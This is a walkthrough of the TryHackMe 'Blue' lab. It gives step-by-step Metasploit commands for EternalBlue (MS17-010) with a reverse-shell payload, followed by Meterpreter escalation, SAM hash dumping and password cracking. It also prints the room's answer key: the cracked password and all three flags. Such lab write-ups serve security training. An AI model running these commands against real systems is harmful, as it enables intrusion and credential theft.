Sunday, May 31, 2026

Tryhackme Blue

TryHackMe — Blue Writeup

Blue is one of the most popular beginner-friendly machines on TryHackMe. It focuses on EternalBlue, the well-known exploit for the SMBv1 bug patched by Microsoft bulletin MS17-010 (CVE-2017-0144).

This room teaches reconnaissance, exploitation, privilege escalation, password cracking, and post-exploitation using Metasploit and Meterpreter.

Warning: For educational purposes only.


Task 1 — Recon

The first step is performing reconnaissance against the target machine.

Nmap Scan

nmap -sV -sC --script vuln -oN blue.nmap YOUR_MACHINE_IP

The vuln script category includes smb-vuln-ms17-010, which is the check that reports the SMBv1 bug here, so expect the scan to take a few minutes. It identifies:

  • Open Ports;
  • Running Services;
  • Service Versions;
  • Potential Vulnerabilities.

Questions & Answers

Q: How many ports below 1000 are open?

A: 3

Q: What vulnerability affects the machine?

A: ms17-010
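Both answers above are read straight out of the -oN report, and on a larger scan it helps to pull them out mechanically. The following Python is an added example (it is not part of the original writeup) that parses nmap's normal-output format: the port table for open ports and the host-script block for any NSE script reporting State: VULNERABLE. The report text embedded below is a constructed sample in the same layout, not the real scan of the room's machine; the host address and the exact wording are illustrative.

```python
import re

# Constructed sample of nmap -oN ("normal") output, trimmed to the lines the parser uses.
# It is NOT the real scan of the room's machine; host, ports and text are illustrative.
SAMPLE_NMAP = """\
# Nmap 7.94 scan initiated as: nmap -sV --script vuln -oN blue.nmap 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.045s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp  open  tcpwrapped
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
| smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
"""

# Port-table lines look like "445/tcp   open  microsoft-ds ...".
OPEN_PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)", re.M)
# A script header is "| name:" with exactly one space after the pipe; nested fields
# such as "|   VULNERABLE:" are indented further and must not be taken for a header.
SCRIPT_NAME_RE = re.compile(r"^\| ([\w-]+):\s*$")


def open_ports(report: str):
    """Return [(port, proto, service), ...] for every 'open' line of the port table."""
    return [(int(p), proto, svc) for p, proto, svc in OPEN_PORT_RE.findall(report)]


def open_ports_below(report: str, limit: int = 1000):
    """Sorted open port numbers under `limit` (the room asks for those below 1000)."""
    return sorted(p for p, _, _ in open_ports(report) if p < limit)


def vulnerable_scripts(report: str):
    """Names of NSE scripts whose block contains 'State: VULNERABLE'.

    Scripts that print 'false' or an NT_STATUS error on their header line never
    produce a State line, so they are never reported.
    """
    current, vulnerable = None, []
    for line in report.splitlines():
        m = SCRIPT_NAME_RE.match(line)
        if m:
            current = m.group(1)
        elif "State: VULNERABLE" in line and current and current not in vulnerable:
            vulnerable.append(current)
    return vulnerable


if __name__ == "__main__":
    print("open ports:", open_ports(SAMPLE_NMAP))
    print("below 1000:", open_ports_below(SAMPLE_NMAP))
    print("vulnerable:", vulnerable_scripts(SAMPLE_NMAP))
```

Run it against your own blue.nmap by reading the file into a string instead of SAMPLE_NMAP; the two answers for Task 1 are the length of open_ports_below() and the script name returned by vulnerable_scripts().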


Task 2 — Gain Access

The target is vulnerable to the famous EternalBlue SMB exploit.

Starting Metasploit

msfconsole

Searching for EternalBlue

search eternalblue

Selected Exploit

Q: What is the full exploit path?

A:

exploit/windows/smb/ms17_010_eternalblue

Configuring the Exploit

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS YOUR_MACHINE_IP

Q: Which required option must be configured?

A: RHOSTS

Setting the Payload

set payload windows/x64/shell/reverse_tcp

A reverse payload also needs LHOST set to the address your attacking machine has on the TryHackMe VPN interface (tun0). If LHOST is left at the default or points at the wrong interface, the exploit can succeed on the target while the callback never reaches you. LPORT can stay at its default unless something else is already listening on it.

Running the Exploit

run

The exploit is not perfectly reliable: if it finishes without opening a session, or the target stops responding, run it again (and restart the target from the room page if needed). After successful exploitation you have a plain command shell, not yet Meterpreter, running on the target as NT AUTHORITY\SYSTEM.


Task 3 — Privilege Escalation

The next step is upgrading the shell to a Meterpreter session.

Shell to Meterpreter Conversion

Q: Which post module converts the shell into Meterpreter?

A:

post/multi/manage/shell_to_meterpreter

Required Option

Q: Which option must be configured?

A: SESSION

Converting the Session

use post/multi/manage/shell_to_meterpreter

set SESSION 1

run

The post module opens a new Meterpreter session alongside the original command shell, which is kept as a fallback. List the sessions and interact with the new Meterpreter session before running the commands below; if your shell was not session 1, set SESSION to whatever number it was given.

Privilege Escalation

getsystem

getsystem attempts to elevate the session; because the EternalBlue exploit already runs its payload as SYSTEM it will usually report that you are there already. Confirm with getuid (or whoami from a shell), which should return:

NT AUTHORITY\SYSTEM

Process Migration

To stabilize the Meterpreter session, list the processes and move into one that runs as NT AUTHORITY\SYSTEM (check the User column of the ps output):

ps
migrate PROCESS_ID

The exploit leaves the payload in a fragile context; migrating into a long-lived SYSTEM process avoids crashes and session drops, and hashdump in the next task depends on running inside such a process.


Task 4 — Password Cracking

Once SYSTEM privileges are obtained (and the session sits in a SYSTEM process), the local account hashes can be read from the SAM. hashdump prints one line per account in the form username:RID:LM hash:NT hash:::.

Dumping Password Hashes

hashdump

Q: What is the non-default username?

A: Jon

Q: What is the cracked password?

A: alqfna22

Only the NT hash (the fourth field) is worth attacking: the LM field aad3b435b51404eeaad3b435b51404ee is the constant printed when LM hashing is disabled and carries no information. The NT hash is an unsalted MD4 of the UTF-16LE password, so wordlist attacks are fast with:

  • John the Ripper (john --format=NT);
  • Hashcat (hashcat -m 1000);
  • Online cracking services (acceptable for lab hashes like this one; never submit hashes from a real engagement to a third-party site).

Task 5 — Finding Flags

The final task involves locating three flag files hidden throughout the Windows system. From Meterpreter, search -f flag*.txt lists all of them in one go; read each with cat (or with type from a Windows shell).

Flag 1

Location: the root of the system drive (C:\flag1.txt)

Flag:

flag{access_the_machine}

Flag 2

Location: next to the SAM hive in C:\Windows\System32\config (C:\Windows\System32\config\flag2.txt), a directory that only elevated access can read

Flag:

flag{sam_database_elevated_access}

Flag 3

Location: the Documents folder of the administrator-level user Jon (C:\Users\Jon\Documents\flag3.txt)

Flag:

flag{admin_documents_can_be_valuable}

Key Concepts Learned

  • Reconnaissance with Nmap;
  • SMB Enumeration;
  • EternalBlue Exploitation;
  • Meterpreter Usage;
  • Privilege Escalation;
  • Hash Dumping;
  • Password Cracking;
  • Windows Post-Exploitation.

About EternalBlue (MS17-010)

EternalBlue is the name of the exploit, not of the bug: it targets CVE-2017-0144, a flaw in the SMBv1 server of Windows, and MS17-010 is the Microsoft bulletin that patched it in March 2017.

The exploit was developed by the NSA and published by the Shadow Brokers group in April 2017, about a month after the patch was released.

Against machines that had not applied the patch it was then used in major attacks such as:

  • WannaCry ransomware (May 2017);
  • NotPetya (June 2017);
  • Mass SMB worm campaigns.

Final Thoughts

Blue is an excellent room for beginners who want to learn practical exploitation and post-exploitation techniques using Metasploit and Meterpreter.

This room helps build foundational skills in:

  • Ethical Hacking;
  • Penetration Testing;
  • Windows Exploitation;
  • Privilege Escalation;
  • SMB Exploitation;
  • Cybersecurity Operations.

SEO Tags

TryHackMe, Blue, EternalBlue, MS17-010, Metasploit, Meterpreter, SMB Exploit, Ethical Hacking, Penetration Testing, Cybersecurity, Windows Exploitation, Hashdump, Red Team, Offensive Security, WannaCry

I hope this writeup helped you understand EternalBlue exploitation and Windows post-exploitation techniques.
